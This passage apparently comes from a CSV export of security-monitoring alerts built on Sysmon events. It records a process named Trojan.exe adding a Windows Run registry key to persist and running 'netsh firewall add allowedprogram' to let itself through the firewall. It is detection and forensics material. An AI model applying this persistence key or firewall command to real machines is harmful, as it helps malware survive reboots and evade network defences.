..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:25:10.540277700Z"",""eventRecordID"":""1814"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:25:10.527\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:25:10.527"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:25:13.411",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:25:09.500 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:25:09.503399400Z"",""eventRecordID"":""1813"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:25:09.500\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:25:09.500"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John 
Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:25:12.285",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:25:08.465 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:25:08.466728000Z"",""eventRecordID"":""1812"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:25:08.465\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:25:08.465"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:25:11.016",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:25:07.434 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:25:07.436356600Z"",""eventRecordID"":""1811"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:25:07.434\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:25:07.434"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:25:09.906",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:25:06.402 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:25:06.414220300Z"",""eventRecordID"":""1810"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:25:06.402\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:25:06.402"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John 
Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:25:09.870",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:25:05.387 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:25:05.389663000Z"",""eventRecordID"":""1808"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:25:05.387\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:25:05.387"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:25:08.722",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:25:04.371 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:25:04.373879600Z"",""eventRecordID"":""1807"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:25:04.371\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:25:04.371"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:25:08.673",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:25:03.355 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:25:03.359442600Z"",""eventRecordID"":""1806"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:25:03.355\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:25:03.355"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John 
Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:25:07.641",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:25:02.339 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:25:02.357161800Z"",""eventRecordID"":""1805"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:25:02.339\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:25:02.339"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:25:04.873",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:25:00.199 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:25:00.212143700Z"",""eventRecordID"":""1803"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:25:00.199\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:25:00.199"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:25:04.813",10,"ATT&CK T1090: Netsh","""Process Create: +RuleName: +UtcTime: 2020-05-24 16:25:00.205 +ProcessGuid: {df9fc3d3-9fdc-5eca-0000-0010417a0c00} +ProcessId: 4804 +Image: C:\Windows\SysWOW64\netsh.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Network Command Shell +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: netsh.exe +CommandLine: netsh firewall add allowedprogram ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ""Trojan.exe"" ENABLE +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-9fb6-5eca-0000-0020f3660300} +LogonId: 0x366F3 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=718A726FCC5EFCE3529E7A244D87F13F,SHA256=E04FB93A81C7C469BA16CEFD9B5B1FC355E86465FF24EA7B9C3FAB5C52AB2F7D,IMPHASH=C8D91522FEEE1152DC40833F6A4717E7 +ParentProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ParentProcessId: 6484 +ParentImage: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +ParentCommandLine: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""","netsh firewall add allowedprogram \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" \""Trojan.exe\"" ENABLE",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:25:00.211884000Z"",""eventRecordID"":""1802"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-24 16:25:00.205\r\nProcessGuid: {df9fc3d3-9fdc-5eca-0000-0010417a0c00}\r\nProcessId: 4804\r\nImage: C:\\Windows\\SysWOW64\\netsh.exe\r\nFileVersion: 10.0.18362.1 
(WinBuild.160101.0800)\r\nDescription: Network Command Shell\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: netsh.exe\r\nCommandLine: netsh firewall add allowedprogram \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" \""Trojan.exe\"" ENABLE\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-9fb6-5eca-0000-0020f3660300}\r\nLogonId: 0x366F3\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=718A726FCC5EFCE3529E7A244D87F13F,SHA256=E04FB93A81C7C469BA16CEFD9B5B1FC355E86465FF24EA7B9C3FAB5C52AB2F7D,IMPHASH=C8D91522FEEE1152DC40833F6A4717E7\r\nParentProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nParentProcessId: 6484\r\nParentImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""utcTime"":""2020-05-24 